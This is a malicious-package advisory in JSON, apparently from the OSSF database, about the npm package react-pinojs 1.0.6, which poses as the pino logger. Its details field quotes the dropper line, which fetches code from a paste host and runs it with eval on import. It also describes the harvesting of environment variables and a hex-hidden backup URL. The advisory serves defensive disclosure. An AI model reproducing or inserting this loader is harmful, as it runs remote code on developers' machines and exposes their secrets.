{"id":"MAL-2026-5488","summary":"Malicious code in react-pinojs (npm)","details":"\n---\n_-= Per source details. Do not edit below this line.=-_\n\n## Source: amazon-inspector (db767edd3581eec08793cb669f0ec59351e61f31501b6d4287b86baea512bb63)\nPackage impersonates the popular pino logger (homepage points to getpino.io, description mimics pino's tagline) and executes a remote-code-execution dropper on import. lib/writer.js — loaded transitively by the main entry pino.js — performs require('axios').get('https://www.jsonkeeper.com/b/MYUKZ').then(r =\u003e { eval(r.data.content_o); }), passing arbitrary attacker-controlled JavaScript fetched from an anonymous, mutable paste host directly to eval at module load time. Before the eval fires, writer.js assembles a data object containing the full process.env, os.platform(), os.hostname(), os.userInfo().username, and non-internal MAC addresses, which is in scope for the eval'd payload. A second hex-encoded channel is hidden in writer.js: byte arrays decode to the strings 'axios', 'get', 'then', and the URL https://www.jsonkeeper.com/b/HY6M6 — a backup fetch endpoint concealed from trivial source greps. Any project that runs require('react-pinojs') (or imports it) executes attacker-controlled code with access to the installer's environment variables, hostname, username, and MAC addresses.\n","modified":"2026-06-09T21:46:29.657591528Z","published":"2026-06-09T21:31:27Z","database_specific":{"malicious-packages-origins":[{"id":"IN-MAL-2026-005247","import_time":"2026-06-09T21:37:56.744147039Z","versions":["1.0.6"],"modified_time":"2026-06-09T21:31:27Z","source":"amazon-inspector","sha256":"db767edd3581eec08793cb669f0ec59351e61f31501b6d4287b86baea512bb63"}]},"references":[{"type":"PACKAGE","url":"https://www.npmjs.com/package/react-pinojs/v/1.0.6"}],"affected":[{"package":{"name":"react-pinojs","ecosystem":"npm","purl":"pkg:npm/react-pinojs"},"versions":["1.0.6"],"database_specific":{"indicators":{"evidence_files":[{"tlsh":"781120a2c392a414223017f248db4820bee5f35120d3418cbebc8ada2bf39e17154fa8","path":"lib/writer.js","sha256":"b6d314d7ec721484bb7a6d72c9dc580e8b9e9d53ca459480f98a20366b823c7d"},{"tlsh":"1201bd10cd788d6308f828919c290187aa609c5b581cbd5d73d3631c0f4e5bf15ba16d","path":"package.json","sha256":"3d5bec867b573c4184c8640f1690df68c995d29527c25e2366161d5416293ce6"}],"package_integrity":[{"hashes":{"sha1":"1c3d3d0b4b04a4c6c4750d62e884ce7f19f8e4ed","sha512_sri":"sha512-asMwMjTL2bDYtIH7kYErA1jWdgHpY8qd77qHyni4T+Gfn8WoXUJ4lm07sOI47yqvgaFLFvCs+vH/U61Ckj0NdA=="},"filename":"react-pinojs-1.0.6.tgz"}]},"source":"https://github.com/ossf/malicious-packages/blob/main/osv/malicious/npm/react-pinojs/MAL-2026-5488.json","cwes":[{"name":"Embedded Malicious Code","description":"The product contains code that appears to be malicious in nature.","cweId":"CWE-506"}]}}],"schema_version":"1.7.5","credits":[{"name":"Amazon Inspector","contact":["inspector-research@amazon.com"],"type":"FINDER"}]}